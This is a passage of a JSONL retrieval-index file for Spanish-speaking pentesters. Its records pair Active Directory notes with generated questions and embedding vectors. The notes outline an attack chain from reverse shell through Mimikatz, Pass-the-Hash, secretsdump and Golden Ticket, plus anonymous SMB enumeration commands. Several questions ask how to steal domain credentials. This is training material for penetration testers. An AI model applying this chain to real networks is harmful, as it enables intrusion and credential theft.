-0.01662, 0.03781, 0.02915, -0.00941, 0.07935, 0.00056, 0.05458, 0.01083, -0.03429, -0.0205, -0.02678, 0.0318, 0.01254, 0.0139, 0.01223, -0.00986, 0.03886, 0.03162, -0.01856, 0.00493, 0.05857, 0.00153, 0.00522, -0.01648, -0.02889, 0.06507, -0.01118, -0.02206, 0.00305, -0.00332, -0.08048, -0.00266, -0.01781, -0.051, 0.02892, 0.02107, 0.04289, -0.02948, -6e-05, -0.01182]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## La cadena de ataque tΓ­pica\n```\n1) RCE en web β†’ Reverse shell en USER1\n2) PEASS-ng β†’ privesc β†’ SYSTEM en USER1 (Privesc Windows / Potato attacks)\n3) Mimikatz β†’ hash NTLM de un usuario de dominio\n4) BloodHound β†’ ΒΏcamino a Domain Admin?\n5) Pass-the-Hash / Impacket β†’ shell en SERVER2 (Movimiento lateral)\n6) si SERVER2 = DC β†’ secretsdump β†’ toda la BD del dominio\n7) hash de krbtgt β†’ Golden Ticket β†’ dios\n```", "indexar": "con que puedo simular un movimiento lateral desde una mΓ‘quina comprometida hacia el servidor de dominio?", "v": [0.01114, 0.0919, -0.18563, -0.13348, -0.21496, -0.08269, -0.08916, 0.01155, -0.0233, -0.01611, -0.05958, -0.03258, 0.09568, -0.08255, 0.04785, 0.03451, 0.20213, -0.02597, -0.05011, -0.00963, -0.01481, -0.0627, 0.08927, -0.07748, 0.09005, 0.03275, 0.03224, -0.07934, -0.12209, -0.0644, -0.03706, 0.00765, 0.15455, -0.08517, 0.07443, -0.14641, -0.02117, 0.11609, 0.06111, 0.05496, 0.0148, -0.00826, -0.12973, -0.00384, 0.00422, 0.03107, -0.0067, -0.1359, 0.00466, -0.09163, -0.05533, -0.04051, -0.07218, -0.0253, 0.01208, -0.08764, 0.18079, -0.13933, 0.1079, -0.13728, -0.02176, 0.00326, -0.03586, 0.01766, 0.01992, -0.06951, 0.00523, -0.03651, -0.03847, -0.04351, -0.03483, 0.00906, -0.03334, -0.03089, 0.06571, 0.01608, 0.02497, -0.03028, 0.04909, 0.02756, 0.01648, 0.03952, -0.07225, 0.06237, -0.07393, -0.1235, 0.00136, -0.02978, 0.15449, 0.03865, 0.09163, 0.09115, -0.11742, 0.06563, 0.00807, -0.00332, 0.03871, -0.06409, -0.03488, -0.05428, 0.16274, 0.11372, -0.10275, 0.03464, 0.07378, 0.08651, 0.12934, -0.05258, 0.06491, 0.00695, 0.05509, -0.04133, -0.102, -0.00999, -0.01486, 0.02644, -0.08701, -0.00274, 0.03287, 0.04871, 0.02061, -0.0718, 0.03309, -0.05296, -0.01774, -0.0452, 0.00207, 0.01212, -0.07667, -0.09941, 0.04401, 0.00874, -0.06594, -0.02306, -0.00681, 0.03501, 0.11633, 0.01154, 0.02248, -0.08569, 0.05869, 0.08709, -0.0526, -0.05584, 0.02607, 0.00252, 0.12136, -0.08064, -0.07822, 0.02339, -0.03641, -0.03021, 0.02558, 0.05752, -0.08797, 0.0708, -0.06248, -0.038, -0.06583, 0.02651, 0.00896, 0.08907, -0.03784, 0.02523, 0.0116, -0.02574, 0.00344, 0.01905, -0.00074, 0.03938, -0.0782, 0.04345, 0.01662, 0.01191, 0.04915, 0.03559, -0.05544, -0.04053, 0.02666, 0.00963, -0.04252, 0.03421, -0.0018, 0.01055, -0.02436, 0.01356, 0.0008, -0.01608, 0.04553, 0.06455, 0.05922, 0.05098, -0.05432, -0.00158, 0.02917, -0.04959, -0.02331, 0.02034, 0.05837, -0.00645, -0.07042, -0.04851, -0.03207, -0.00757, -0.00918, 0.04707, -0.03272, 0.01791, 0.00145, -0.01346, -0.02604, -0.04003, 0.09586, -0.02775, -0.02833, -0.00162, 0.0302, -0.01987, -0.06301, -0.05491, -0.00473, 0.00072, 0.00824, 0.00499, 0.00702, 0.01281, 0.06047, 0.03029, 0.03319, 0.00507, -0.01126, 0.0517, -0.00464, -0.02367, 0.036, 0.03671, 0.10625, -0.04189, -0.09249, -0.05032, -0.01832, 0.05458, 0.0011, -0.08408, -0.01924, -0.07827, -0.06401, 0.00017, -0.01645, -0.01618, 0.01435, -0.02716, 0.04463, -0.04396, 0.01099, 0.02584]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## La cadena de ataque tΓ­pica\n```\n1) RCE en web β†’ Reverse shell en USER1\n2) PEASS-ng β†’ privesc β†’ SYSTEM en USER1 (Privesc Windows / Potato attacks)\n3) Mimikatz β†’ hash NTLM de un usuario de dominio\n4) BloodHound β†’ ΒΏcamino a Domain Admin?\n5) Pass-the-Hash / Impacket β†’ shell en SERVER2 (Movimiento lateral)\n6) si SERVER2 = DC β†’ secretsdump β†’ toda la BD del dominio\n7) hash de krbtgt β†’ Golden Ticket β†’ dios\n```", "indexar": "cual es una herramienta para extraer hashes NTLM o credentials de un usuario de dominio?", "v": [0.05228, -0.04456, -0.01612, -0.13381, 0.04851, -0.07887, -0.12778, 0.02292, -0.08894, 0.07733, -0.07936, -0.04634, -0.03449, -0.13662, -0.02815, 0.00749, 0.13753, -0.10421, -0.02637, 0.0325, -0.07674, 0.00757, -0.12816, -0.01766, -0.07362, -0.10296, -0.0055, -0.03423, -0.14643, 0.17914, -0.00116, -0.04219, -0.05476, -0.02062, -0.00033, -0.04006, 0.00088, 0.05075, -0.01301, 0.19377, 0.08528, 0.08762, -0.10419, 0.11323, -0.00948, 0.02689, -0.09025, -0.03567, 0.09599, -0.1369, 0.02357, -0.09221, -0.22673, -0.06701, 0.05359, -0.0836, 0.23203, -0.09735, -0.00695, -0.04283, -0.09294, -0.01854, -0.00897, -0.0217, -0.1456, -0.12306, 0.02455, -0.01205, -0.08881, 0.10172, -0.07414, 0.01683, 0.08834, -0.07646, 0.04886, -0.01632, 0.05298, -0.0275, 0.1125, 0.02768, 0.07217, -0.06679, -0.04465, -0.04721, -0.15024, -0.09895, 0.02036, -0.0853, 0.05456, 0.0414, 0.06929, 0.07597, -0.04801, -0.04977, 0.02076, -0.10117, 0.0676, -0.07604, -0.04419, -0.04281, 0.09842, 0.04311, -0.11374, 0.14402, 0.00479, -0.00569, 0.02751, -0.03781, -0.05821, 0.01133, 0.10157, -0.01481, -0.0572, -0.00208, -0.05728, 0.12082, -0.07308, -0.06301, -0.03716, -0.0742, -0.02842, -0.03938, 0.04928, -0.00589, 0.04367, -0.00924, -0.04401, 0.06095, -0.06193, -0.1808, 0.01239, -0.0309, -0.03651, 0.06268, 0.03676, 0.02354, 0.02339, -0.09286, -0.02494, -0.05239, 0.02617, -0.01638, -0.04676, -0.04018, 0.05176, -0.01119, 0.00668, -0.07315, -0.05454, -0.03542, 0.01868, -0.03748, -0.01724, 0.02389, -0.04145, 0.03319, -0.07191, 0.01317, -0.12642, 0.04523, -0.00988, -0.03895, 0.03638, 0.0194, 0.00652, -0.05228, 0.03675, -0.02633, 0.02771, 0.02592, 0.02663, 0.01737, 0.02822, -0.02918, 0.0331, -0.05907, 0.00519, -0.02344, -0.00519, -0.06404, 0.01119, -0.03472, 0.02387, -0.02404, 0.00616, -0.012, 0.04413, -0.00831, -0.02613, 0.04071, 0.00514, 0.08419, -0.05278, -0.03606, 0.02918, -0.02026, -7e-05, -0.05931, 0.01479, -0.03081, -0.04644, 0.03199, -0.01126, -0.04201, 0.00218, 0.03826, -0.03455, -0.06052, -0.01631, -0.01151, 0.02459, -2e-05, 0.01222, -0.04939, -0.06829, -0.00788, -0.00922, 0.00012, -0.03362, -0.07046, -0.03774, 0.03115, 0.04537, 0.00807, -0.00789, -0.01531, 0.01835, 0.02663, -0.00709, -0.01287, 0.01693, -0.01514, -0.00923, -0.01428, 0.06019, -0.01181, 0.02524, 0.0069, -0.02791, -0.03175, -0.02317, 0.03215, 0.02054, -0.02206, -0.03242, -0.02904, -0.05966, 0.03638, -0.03552, -0.05119, 0.01679, -0.01905, 0.05958, -0.00736, -0.00869, -0.01428]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## La cadena de ataque tΓ­pica\n```\n1) RCE en web β†’ Reverse shell en USER1\n2) PEASS-ng β†’ privesc β†’ SYSTEM en USER1 (Privesc Windows / Potato attacks)\n3) Mimikatz β†’ hash NTLM de un usuario de dominio\n4) BloodHound β†’ ΒΏcamino a Domain Admin?\n5) Pass-the-Hash / Impacket β†’ shell en SERVER2 (Movimiento lateral)\n6) si SERVER2 = DC β†’ secretsdump β†’ toda la BD del dominio\n7) hash de krbtgt β†’ Golden Ticket β†’ dios\n```", "indexar": "que programa sirve para generar tickets golden ticket sin acceso fΓ­sico a la mΓ‘quina?", "v": [-0.0851, -0.0672, -0.12596, -0.17681, -0.04944, -0.10598, -0.09344, -0.01623, 0.01586, -0.07996, -0.02918, -0.00986, -0.05183, 0.09163, 0.10201, -0.02722, 0.07543, -0.04895, 0.13858, 0.06753, -0.00732, 0.06382, 0.06617, -0.20761, 0.04241, 0.04527, 0.10204, -0.02256, -0.14732, -0.00464, 0.1252, -0.05975, 0.0424, -0.20078, 0.033, -0.11719, 0.03851, 0.15272, 0.01161, -0.04586, -0.01063, 0.0152, -0.06119, 0.06614, 0.07712, -0.09655, 0.09192, 0.10063, -0.05016, -0.07618, 0.00585, -0.02139, 0.01108, 0.03564, -0.00798, -0.15625, -0.00989, -0.08831, -0.03083, 0.06511, -0.0406, -0.10373, -0.02647, -0.02819, -0.08143, 0.16838, 0.11662, 0.00352, 0.00422, -0.12404, -0.1747, -0.04398, 0.04004, 0.03831, 0.02096, 0.03391, 0.05229, 0.02754, 0.02691, -0.02498, -0.02301, 0.03892, 0.00624, 0.0133, 0.0165, -0.03359, 0.10892, -0.00871, -0.01402, 0.01387, 0.06385, 0.08683, 0.07933, -0.01485, 0.04154, -0.05569, -0.02608, -0.06452, -0.04283, 0.08282, 0.04316, -0.02928, -0.0582, 0.00083, -0.06503, 0.09208, 0.06592, -0.01812, -0.10073, 0.05802, -0.03253, 0.02647, -0.12355, -0.02017, -0.0631, 0.04596, 0.0413, -0.01027, 0.02637, -0.00211, -0.01092, 0.03273, 0.00082, -0.10309, 0.04598, -0.00609, 0.00285, 0.08457, 0.04103, 0.04402, 0.08, 0.07639, -0.02288, 0.02615, -0.1016, -0.09285, -0.03515, -0.02973, 0.07078, 0.02465, 0.08092, 0.08814, -0.00432, -0.01173, 0.01094, -0.04597, 0.02823, -0.06982, -0.07915, -0.0193, 0.02391, -0.06428, 0.00417, 0.1292, -0.07278, 0.06378, 0.0035, -0.03275, -0.08635, 0.03354, -0.10636, 0.0572, -0.04716, 0.0397, 0.00653, 0.05149, -0.08741, -0.02204, 0.02094, 0.07446, -0.014, 0.01506, 0.11005, -0.00453, -0.01795, -0.01575, -0.04025, -0.02987, 0.07137, -0.00931, -0.0022, -0.0227, -0.00687, -0.00277, -0.08599, 0.00722, -0.04534, -0.00638, 0.07087, 0.01899, 0.02716, 0.00455, -0.01905, 0.02931, -0.03397, -0.08297, -0.08534, 0.01294, 0.01585, -0.0304, -0.06269, 0.0178, -0.0124, 0.03096, 0.08719, 0.08144, 0.02108, -0.0552, 0.01643, 0.05488, 0.04885, -0.06286, 0.05082, -0.00736, -0.03276, -0.06679, 0.04672, 0.02127, -0.02686, 0.01294, 0.07634, -0.03059, 0.01497, 0.03689, 0.04392, -0.09254, 0.0882, 0.04909, 0.12585, 0.00172, 0.02622, 0.0075, 0.0131, 0.01649, 0.04737, 0.01628, 0.02594, -0.05023, -0.08496, -0.03685, 0.0065, 0.0716, 0.00938, -0.01783, 0.00587, 0.04117, -0.05016, 0.00257, 0.0166, 0.01056, -0.00576, 0.01086, 0.00851, 0.00234, 0.00784, -0.01636]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Los 7 caminos que SIEMPRE pruebas\n1. **Anonymous SMB** β†’ SMB (`smbclient -L //IP -N`, `nxc smb IP -u \"\" -p \"\"`)\n2. **AS-REP Roasting** β†’ AS-REP Roasting\n3. **Kerberoasting** β†’ Kerberoasting\n4. **GPP cpassword** β†’ GPP cpassword\n5. **LAPS** β†’ LAPS\n6. **ACL abuses** β†’ ACL abuses (te los pinta BloodHound)\n7. **DCSync** β†’ DCSync", "indexar": "que herramientas puedo usar para robar credenciales de dominio sin contraseΓ±a?", "v": [0.00923, -0.06002, -0.16876, -0.16918, -0.04724, -0.01558, 0.07355, 0.01165, -0.0933, -0.05569, -0.06063, -0.10408, 0.01825, -0.16007, 0.04621, 0.03062, 0.06438, 0.07687, -0.03754, -0.00604, 0.01002, -0.07758, -0.02476, 0.00237, 0.05759, -0.05608, 0.02655, -0.0729, -0.09849, 0.1016, 0.01942, -0.01558, 0.09307, 0.02341, -0.0815, 0.03457, -0.02482, 0.04888, 0.062, 0.16828, 0.12173, 0.05523, -0.16033, 0.08794, 0.00275, 0.02604, -0.03438, -0.03043, 0.02928, 0.04237, -0.06384, -0.1842, -0.10938, -0.12273, 0.02833, -0.09859, 0.19164, -0.02905, 0.04108, -0.10075, -0.14933, -0.00094, -0.03776, 0.11462, -0.0818, -0.1291, 0.02259, -0.01487, -0.07702, 0.10864, -0.01513, -0.00244, -0.04861, 0.07072, 0.05252, -0.07313, 0.03937, -0.01329, 0.0739, 0.03526, -0.04214, 0.01169, -0.01617, -0.01175, -0.10156, -0.05352, 0.07511, -0.07368, 0.07065, -0.04133, 0.06587, 0.06569, -0.0856, -0.04819, -0.03179, -0.05909, 0.00248, -0.01675, -0.08279, -0.05374, 0.09177, 0.01212, -0.0429, 0.14009, 0.00904, 0.02316, -0.01827, 0.0031, 0.01645, -0.11022, -0.02531, -0.01363, -0.0711, -0.03279, -0.01735, 0.07346, -0.06401, -0.10236, -0.00753, -0.0634, 0.03375, -0.12738, 0.0171, -0.02151, 0.07259, -0.00465, 0.0143, 0.03834, -0.07145, -0.17821, 0.00162, -0.02189, -0.01071, 0.01053, 0.02923, 0.04836, -0.01056, -0.14979, -0.13995, -0.018, -0.01528, 0.01582, -0.09318, -0.0521, 0.0303, 0.01525, 0.04011, -0.09174, -0.03181, -0.0564, -0.03882, -0.00959, -0.03186, 0.02959, 0.01901, 0.07859, -0.02159, -0.05686, -0.06033, 0.02568, -0.06412, -0.04119, -0.02664, 0.03274, -0.06973, -0.08275, 0.09279, 0.05426, 0.01147, 0.0348, 0.08451, 0.0911, 0.0268, -0.00699, 0.00896, -0.02202, 0.02703, -0.02428, -0.04588, -0.08379, -0.02269, -0.01003, -0.00399, 0.02488, -0.00371, 0.01851, 0.0744, -0.01811, -0.04839, 0.01194, 0.02165, 0.00403, -0.01299, 0.05152, 0.02598, -0.02476, 0.00133, -0.00867, -0.01363, -0.02143, -0.01133, 0.0197, -0.04593, -0.04276, 0.08168, -0.01233, -0.05716, -0.05713, -0.0202, 0.00307, 0.03445, -0.03594, 0.02902, -0.09672, -0.03503, -0.0312, -0.05315, 0.07065, -0.09221, -0.07897, 0.03138, 0.06779, 0.02045, 0.022, 0.02577, 0.0335, -0.08165, -0.00417, 0.00015, 0.00529, -0.02106, 0.03899, -0.06976, -0.01294, 0.04469, -0.05343, -0.00563, -0.02604, 0.00027, -0.0048, -0.09834, 0.05027, 0.00527, -0.07716, -0.10757, 0.01415, -0.05428, 0.02018, -0.01488, -0.00482, 0.0253, 0.01632, 0.00333, -0.02515, -0.0172, 0.00465]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Los 7 caminos que SIEMPRE pruebas\n1. **Anonymous SMB** β†’ SMB (`smbclient -L //IP -N`, `nxc smb IP -u \"\" -p \"\"`)\n2. **AS-REP Roasting** β†’ AS-REP Roasting\n3. **Kerberoasting** β†’ Kerberoasting\n4. **GPP cpassword** β†’ GPP cpassword\n5. **LAPS** β†’ LAPS\n6. **ACL abuses** β†’ ACL abuses (te los pinta BloodHound)\n7. **DCSync** β†’ DCSync", "indexar": "con quΓ© programa puedo obtener permisos de administrador en un servidor Windows?", "v": [0.02226, 0.11047, -0.05188, -0.23778, -0.00025, -0.06221, 0.03302, -0.16799, -0.08284, -0.1082, -0.00526, -0.04017, 0.05845, -0.10046, -0.00225, 0.03021, 0.19067, -0.0829, 0.05864, 0.11826, 0.09924, 0.0102, 0.03932, 0.03668, -0.05637, 0.02913, 0.08492, -0.04654, -0.07158, -0.07133, 0.01109, -0.03958, 0.02853, -0.05198, 0.06497, 0.02726, -0.02555, 0.15363, -0.00634, 0.04226, 0.06226, 0.04978, -0.05986, 0.04296, 0.05246, -0.06549, 0.05368, -0.09493, 0.09816, -0.08874, -0.05908, -0.08294, -0.08072, -0.07619, 0.08767, 0.02515, 0.08375, -0.16244, 0.0246, 0.05301, -0.08302, 0.05849, -0.01947, 0.01497, 0.00875, 0.0433, 0.13392, -0.00482, -0.01256, 0.07329, -0.10039, 0.03076, 0.04197, -0.02783, 0.07892, 0.07711, -0.12219, -0.03332, 0.06983, -0.01021, 0.05419, 0.09593, -0.05144, 0.00992, -0.08011, -0.16469, -0.06281, -0.09132, 0.02538, -0.03333, 0.07362, 0.02249, -0.06916, 0.08685, 0.05618, -0.07635, 0.12393, 0.01841, -0.05659, 0.09709, 0.01026, -0.00012, -0.06699, 0.14983, -0.06115, 0.16065, 0.10853, -0.10072, -0.04594, 0.01767, 0.02201, 0.01881, -0.07484, 0.02907, -0.07412, 0.00701, -0.0314, -0.05954, 0.00622, 0.03396, -0.09695, -0.00314, -0.01349, 0.09778, 0.0938, -0.04964, 0.01331, 0.14461, -0.07605, 0.00645, 0.01752, -0.02564, -0.02863, -0.0332, -0.11019, 0.04072, -0.00025, -0.01093, -0.03739, -0.05931, -0.0149, 0.05023, 0.08419, 0.0373, 0.09496, 0.00223, 0.02642, -0.04761, -0.04496, -0.04396, 0.0569, -0.03267, -0.05066, 0.06361, -0.09495, 0.00499, 0.01504, -0.0191, -0.0199, 0.07254, 0.02659, 0.02753, -0.03027, 0.05642, 0.05578, -0.01008, -0.03437, 0.02739, 0.06459, 0.05077, -0.09694, 0.0567, 0.00112, -0.05722, 0.0222, 0.00324, -0.01775, -0.09204, -0.00997, 0.00615, -0.09113, 0.06187, 0.00272, 0.00489, -0.07831, -0.02804, -0.06073, 0.06657, -0.01962, 0.02473, 0.01836, 0.04139, 0.00626, -0.0197, 0.03403, -0.03728, -0.0165, -0.01519, -0.01223, -0.05596, -0.03346, -0.02167, -0.02279, -0.04541, 0.07051, -0.00025, -0.03749, 0.06865, 0.07633, 0.07302, -0.0143, -0.03402, 0.07227, -0.03474, -0.04011, -0.03467, 0.04815, 0.00107, 0.02691, -0.03917, 0.03801, 0.01119, 0.05365, 0.03773, 0.04553, -0.08832, -0.0028, 0.01893, 0.04134, 0.05613, -0.04623, 0.00982, -0.01808, -0.02117, 0.04779, 0.00113, 0.02621, -0.06383, -0.00428, -0.04287, -0.02106, 0.0739, 0.01681, -0.08151, -0.05343, -0.04092, -0.00739, -0.00178, -0.03661, -0.03318, 0.01105, 0.00886, 0.02076, -0.04865, -0.00143, 0.02603]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Los 7 caminos que SIEMPRE pruebas\n1. **Anonymous SMB** β†’ SMB (`smbclient -L //IP -N`, `nxc smb IP -u \"\" -p \"\"`)\n2. **AS-REP Roasting** β†’ AS-REP Roasting\n3. **Kerberoasting** β†’ Kerberoasting\n4. **GPP cpassword** β†’ GPP cpassword\n5. **LAPS** β†’ LAPS\n6. **ACL abuses** β†’ ACL abuses (te los pinta BloodHound)\n7. **DCSync** β†’ DCSync", "indexar": "cual es una alternativa libre a BloodHound para mapear las relaciones de permisos de red?", "v": [-0.07352, 0.03903, 0.05996, -0.09068, -0.13109, 0.03849, -0.04741, -0.04844, -0.05161, -0.066, -0.04834, -0.16214, 0.09356, 0.00883, 0.10651, -0.02191, 0.01293, 0.07564, 0.11633, -0.08404, 0.00188, -0.05462, -0.14907, 0.07586, -0.03323, 0.0116, 0.13374, 0.03717, -0.10698, -0.03363, -0.04212, -0.08016, 0.05044, 0.02888, -0.08131, 0.08057, 0.07636, 0.09631, 0.00605, -0.03101, -0.05213, -0.11493, -0.01284, -0.0208, -0.02703, -0.04648, -0.14334, 0.0813, 0.03977, 0.04404, -0.06132, -0.0179, -0.2159, -0.12048, 0.06912, 0.01462, 0.12405, -0.12078, -0.08831, 0.03638, -0.05543, -0.06802, 0.05343, -0.01907, 0.05003, -0.00023, 0.04268, 0.03773, -0.05624, 0.19508, 0.00954, 0.09599, -0.04024, 0.04914, -0.04592, -0.01561, -0.0916, -0.03616, 0.02027, 0.02829, 0.07175, 0.07153, -0.05972, 0.03062, 0.04655, -0.06782, 0.10461, -0.10872, 0.07157, 0.10087, 0.076, 0.03519, -0.00138, 0.0809, 0.04804, -0.17438, -0.0931, 0.04873, -0.01965, 0.00836, 0.05061, 0.09344, -0.15378, 0.05483, -0.00977, -0.02085, -0.01439, 0.00732, 0.00152, 0.0865, 0.04979, 0.04432, -0.00476, 0.06617, -0.01151, -0.07046, 0.08053, 0.069, 0.02356, -0.03886, -0.07192, -0.03049, -0.01361, 0.03268, -0.06059, 0.01937, -0.03595, 0.06702, -0.01038, 0.04805, -0.03087, 0.04166, -0.05945, -0.14372, -0.08189, 0.03607, 0.0, 0.00112, -0.01373, -0.05369, -0.07741, 0.02031, 0.04138, -0.01131, -0.00856, 0.08558, -0.0171, -0.03306, 0.01773, -0.03319, -0.025, 0.03381, -0.04108, 0.09645, 0.00478, 0.08352, -0.07445, -0.0405, -0.06257, 0.08337, 0.03619, -0.02915, -0.0398, 0.06365, 0.03862, 0.09635, -0.03457, 0.01124, -0.05547, -0.01181, 0.03067, 0.03645, 0.00078, -0.05445, 0.02261, -0.08944, 0.0433, -0.16945, -0.02132, -0.0148, 0.08141, -0.01362, -0.09415, 0.0239, 0.02018, -0.02543, -0.0123, -0.0116, 0.0714, -0.03086, -0.03155, 0.07991, 0.07268, -0.03713, 0.02683, 0.00793, 0.09612, -0.04506, -0.07094, -0.04998, 0.01906, -0.045, -0.02229, 0.01454, 0.00497, -0.01363, 0.0049, 0.07606, -0.04962, 0.02016, -0.0109, -0.02173, 0.0675, -0.02578, -0.05542, 0.00414, 0.03015, -0.01067, 0.03116, -0.05313, 0.13365, 0.01844, 0.0266, 0.01285, -0.00355, 0.00533, 0.0557, -0.02246, 0.02141, 0.00863, 0.03248, 0.01553, -0.03673, -0.01691, -0.02062, 0.04308, 0.07072, -0.02185, 0.03726, -0.02478, 0.12282, 0.03624, -0.02221, -0.01967, -0.05784, -0.04285, -0.02544, -0.02822, -0.01764, -0.06439, 0.00724, 0.02639, 0.0459, 0.01658, 0.05762, 0.00125]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Conceptos\n- Kerberos (TGT/TGS) Β· Pass-the-Hash Β· Golden Ticket Β· Silver Ticket\n- Crackear los tickets β†’ Cracking de contraseΓ±as\n- Entrar a la red interna β†’ Pivoting ligolo-ng / Tunneling", "indexar": "que programa sirve para crucear hashes y robar credenciales?", "v": [0.13819, -0.26401, -0.12931, -0.04911, 0.10272, -0.13631, 0.13344, 0.08469, 0.05239, -0.08005, -0.05667, -0.06836, 0.08434, -0.06735, 0.14889, 0.02629, -0.11843, 0.1671, 0.0225, 0.11604, 0.00979, -0.03323, -0.06699, -0.00905, -0.05321, -0.1013, -0.12657, -0.00941, -0.05176, 0.04852, 0.00775, -0.00161, 0.00104, 0.01254, -0.05072, 0.04893, -0.05719, -0.07718, -0.01822, 0.13733, 0.06491, 0.10606, -0.03555, -0.05589, 0.06882, -0.13351, 0.00271, -0.00035, -0.02456, 0.03128, 0.07664, -0.09325, -0.1403, -0.07787, 0.03381, -0.00498, -0.03421, 0.02414, -0.10066, -0.11403, -0.07034, 0.01387, -0.05404, -0.08779, 0.03446, -0.00874, 0.05148, -0.02863, -0.00991, 0.02145, -0.05824, 0.07266, 0.00964, 0.02338, -0.03645, -0.03817, -0.04295, 0.01769, 0.0639, -0.04359, 0.06037, -0.02234, 0.03535, 0.06543, -0.01355, 0.04421, 0.12145, 0.02588, 0.01932, 0.04541, 0.11248, 0.13945, 0.00722, 0.07133, 0.02071, -0.04904, 0.08335, 0.04189, -0.04458, 0.04404, 0.06452, -0.1182, -0.12195, 0.14691, -0.09647, 0.08929, 0.06589, 0.03933, 0.02495, -0.07159, 0.03215, -0.0583, -0.01009, 0.01079, -0.05045, 0.06598, -0.01496, 0.00914, 0.00502, -0.03514, -0.00848, -0.04777, -0.0036, 0.07463, 0.08729, -0.00702, -0.01333, 0.09942, -0.06764, -0.05339, -0.00689, 0.04522, 0.0099, 0.02127, -0.00634, -0.06969, 0.04437, -0.1142, -0.04697, -0.00029, 0.03854, 0.08577, -0.01126, 0.02405, -0.00181, 0.02856, 0.04646, -0.07388, 0.05455, -0.06795, 0.01527, 0.03861, -0.07638, 0.0039, 0.01025, -0.03449, 0.05307, -0.06295, -0.13625, 0.05741, -0.06199, -0.03728, 0.02311, -0.02982, -0.00439, -0.04326, 0.06323, 0.07145, 0.05078, 0.08559, 0.0404, 0.00218, 0.05285, -0.05826, 0.00652, 0.02527, 0.04744, -0.0241, -0.00796, -0.06453, -0.06308, 0.03939, 0.08685, 0.05259, -0.02826, 0.02953, -0.03147, 0.06881, 0.00807, -0.06937, 0.01982, -0.06596, -0.05465, 0.02945, 0.00963, 0.03023, 0.02418, 0.02013, 0.02072, -0.01171, -0.03877, 0.02887, -0.01487, 0.0147, 0.09835, 0.08315, 0.00466, -0.03578, 0.02834, 0.10317, 0.0112, 0.02526, 0.00319, -0.0039, -0.04385, -0.03436, -0.02976, 0.0928, 0.00754, -0.0233, -0.00048, 0.0075, 0.00742, 0.05937, 0.01484, 0.00155, -0.05562, 0.0127, -0.0018, -0.00822, 0.01152, -0.03307, -0.06709, -0.03103, -0.03372, -0.04357, -0.05017, 0.0321, 0.06366, -0.14289, -0.08444, 0.07039, -0.0611, -0.07698, -0.0155, 0.04167, -0.01289, 0.02666, 0.04471, 0.01826, -0.00708, 0.05926, -0.02756, 0.00529, 0.02325, -0.00695]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Conceptos\n- Kerberos (TGT/TGS) Β· Pass-the-Hash Β· Golden Ticket Β· Silver Ticket\n- Crackear los tickets β†’ Cracking de contraseΓ±as\n- Entrar a la red interna β†’ Pivoting ligolo-ng / Tunneling", "indexar": "cual es una alternativa libre a cracklear los tickets Kerberos?", "v": [-0.10327, -0.11649, -0.02598, 0.00943, -0.11695, -0.16612, 0.05373, 0.19439, -0.02341, -0.07036, -0.07568, -0.17879, -0.03599, -0.03127, 0.2199, -0.03442, -0.08995, -0.01083, 0.26801, 0.03316, -0.00263, 0.02225, -0.05345, -0.05457, -0.1049, -0.06865, -0.04915, 0.00667, -0.11313, -0.05761, -0.04865, 0.00809, 0.06645, -0.05271, 0.08081, -0.02068, 0.0722, 0.09908, 0.10351, -0.00726, 0.00544, -0.08943, 0.0032, 0.10739, -0.04242, -0.04522, -0.08809, 0.14432, 0.03312, -0.02605, 0.00378, -0.04048, -0.05265, 0.09048, 0.04994, -0.09504, 0.08629, -0.07064, -0.11144, 0.03622, -0.1065, 0.00312, -0.02757, -0.02113, -0.01878, -0.02848, -0.02549, -0.03243, -0.00725, -0.01797, -0.04249, 0.04886, 0.09828, 0.02852, -0.03865, 0.14037, 4e-05, -0.0151, 0.0118, 0.08327, 0.07573, -0.0364, 0.06267, 0.10562, 0.00822, -0.0222, 0.11768, -0.08227, -0.03681, 0.10803, 0.03955, 0.08425, 0.03074, 0.13655, -0.00352, -0.14854, -0.00803, 0.0628, -0.06868, 0.04658, -0.05522, -0.07903, -0.07737, -0.02564, -0.03508, 0.00205, -0.0456, 0.00943, -0.05417, 0.04159, 0.03001, 0.09541, -0.02884, 0.05419, -0.02683, 0.00155, 0.00435, 0.00913, 0.03408, 0.04418, -0.02348, 0.00357, -0.06334, -0.14367, 0.0115, 0.03271, 0.06455, 0.11033, -0.04078, -0.02337, 0.07171, -0.00692, -0.05743, -0.03705, -0.1143, -0.05316, 0.03474, -0.07098, 0.00352, 0.04316, 0.01296, 0.05896, 0.007, 0.02822, 0.06379, -0.0349, -0.04348, 0.01938, 0.02907, -0.03921, -0.0519, 0.05054, -0.0087, 0.11661, -0.02248, 0.07955, -0.00746, -0.03594, -0.01665, 0.07603, -0.01717, -0.04243, 0.01219, 0.05968, -0.0079, 0.00326, -0.02095, -0.02896, -0.05346, 0.08219, -0.00052, 0.08215, 0.09278, 0.02785, 0.05108, -0.08242, 0.04998, -0.05279, 0.00335, -0.11074, 0.08704, -0.00792, -0.05959, 0.00721, -0.03699, -0.03872, 0.05311, -0.04285, -0.00267, 0.02198, 0.00294, -0.01169, -0.03614, -0.03868, -0.0239, -0.01614, -0.02131, -0.07191, -0.04461, -0.01553, -0.09743, -0.02923, 